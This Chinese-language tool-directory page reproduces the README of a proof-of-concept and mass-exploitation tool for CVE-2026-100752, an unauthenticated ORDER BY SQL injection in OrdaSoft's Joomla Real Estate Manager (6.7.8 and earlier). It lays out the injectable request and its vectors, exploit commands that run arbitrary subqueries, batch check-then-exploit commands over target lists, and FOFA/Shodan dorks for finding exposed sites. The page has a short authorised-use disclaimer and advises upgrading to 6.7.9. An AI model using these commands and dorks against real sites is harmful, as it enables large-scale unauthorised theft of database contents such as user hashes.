Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-100752 — Python 3 PoC 及针对 CVE-2026-100752 的大规模利用工具,该漏洞是 OrdaSoft Joomla Real Estate Manager <=6.7.8 中通过 order_field ORDER BY 参数触发的未认证 SQL 注入。 | Kitploit
工具/GitHubGitHub/murrez/cve-2026-100752
侦察漏洞扫描器漏洞分析漏洞利用脚本与自动化Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubmurrez/cve-2026-100752

CVE-2026-100752

Python 3 PoC 及针对 CVE-2026-100752 的大规模利用工具,该漏洞是 OrdaSoft Joomla Real Estate Manager <=6.7.8 中通过 order_field ORDER BY 参数触发的未认证 SQL 注入。

4天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) 未授权 SQL 注入

针对 CVE-2026-100752 的 Python 3 PoC — OrdaSoft Real Estate Manager (Free) Joomla 扩展 ≤ 6.7.8。已在 6.7.9+ 中修复。

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Cataloghttps://pocbit.org/pocs/
Componentcom_realestatemanager
Filesite/realestatemanager.php
Parameterorder_field → ORDER BY(未加引号,无允许列表)
Auth无(公开列表 / 搜索 / 分类视图)
CWECWE-89 SQL 注入
Also旧版 order_direction POST 注入(Metasploit / 6.7.9 之前的审计)

PoC 输出(截图)

彩色 PoCbit 横幅,随后是 --mode exploit JSON 输出:exploited: true,向量 order_field_get,路由 showCategory + com_realestatemanager。

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

示例命令:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(截图取自授权测试环境;目标 URL 用于 PoC 验证。)


漏洞摘要(土耳其语)

Real Estate Manager (Free) 是 OrdaSoft 用于在 Joomla 上管理房产信息的扩展。在 6.7.8 及更早版本中,order_field 请求参数在 site/realestatemanager.php 中被直接拼接到 ORDER BY 子句中;没有列名允许列表、转义或类型转换。无需身份验证即可利用分类浏览、搜索结果和完整房源列表查询。

成功 SQLi 后,应评估从数据库读取(版本、用户哈希、站点数据)、依赖权限的写入/删除以及链式 RCE 风险。请升级到 6.7.9 或更高版本(OrdaSoft 安全发布)。


技术机制

Joomla 前端控制器:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752:order_field 控制 ORDER BY 列/表达式。由于该值在未绑定或验证的情况下被拼接到 SQL 中,因此可以注入诸如基于错误的子查询之类的值。

受影响的查询上下文(根据 CVE 描述):

  1. 分类浏览(showCategory 及相关)
  2. 搜索结果
  3. 完整房源列表

此 PoC:

  • 指纹识别 com_realestatemanager(路径 + 可选 manifest 版本)
  • 从站点 HTML 中抓取 catid / Itemid
  • 探测任务:showCategory、showSearch、showSearchResult、showRent、showBuy
  • 主要: order_field 基于错误的 GET 和 POST
  • 回退: order_direction=asc,<injection>(历史向量,在某些构建上仍然有用)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt(包含成功 SELECT 泄露的行)

要求

cd CVE-2026-100752
pip install -r requirements.txt

用法

单目标 — 检查

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

当布尔/错误证明不确定时,--aggressive 会尝试 SELECT VERSION()。

单目标 — 利用

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

批量处理

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
参数作用
--mode exploit基于错误的数据提取(支持批量)
--subquery用于 CONCAT(0x7e, …) 双查询载荷的内部 SQL
--vector强制使用 order_field_get、order_field_post 或 order_direction_post
-j并行目标数
--no-color纯终端输出

JSONL 包含 pocbit、pocbit_catalog、pocbit_page、cve、component。


FOFA / 资产发现 dorks

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Shodan 风格(如果支持):http.html:com_realestatemanager

将主机名导出到 targets.txt(每行一个 URL),然后仅对授权资产执行 check → hits → exploit。


版本检测

Manifest(当暴露时):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

如果版本 ≤ 6.7.8 → likely_vulnerable_version。如果 ≥ 6.7.9 → patched_version(利用仍可能失败)。


相关 CVE(同一发布批次)

CVE类型修复版本
CVE-2026-100752未授权 SQLi(order_field)6.7.9
CVE-2026-100753反射型 XSS(公开房产视图)6.7.9

同一供应商批次(2026 年 9 月):Vehicle Manager 和其他 OrdaSoft 扩展收到了单独的 CVE — 请修补你运行的所有 OrdaSoft 组件。


参考

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — 三个 OrdaSoft 扩展中的六个缺陷(2026 年 9 月)
  • Metasploit:auxiliary/gather/joomla_com_realestatemanager_sqli(旧版 order_direction POST)

法律

仅限授权安全测试和补丁验证。未经许可,请勿对系统使用。


GitHub 仓库描述

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
下载工具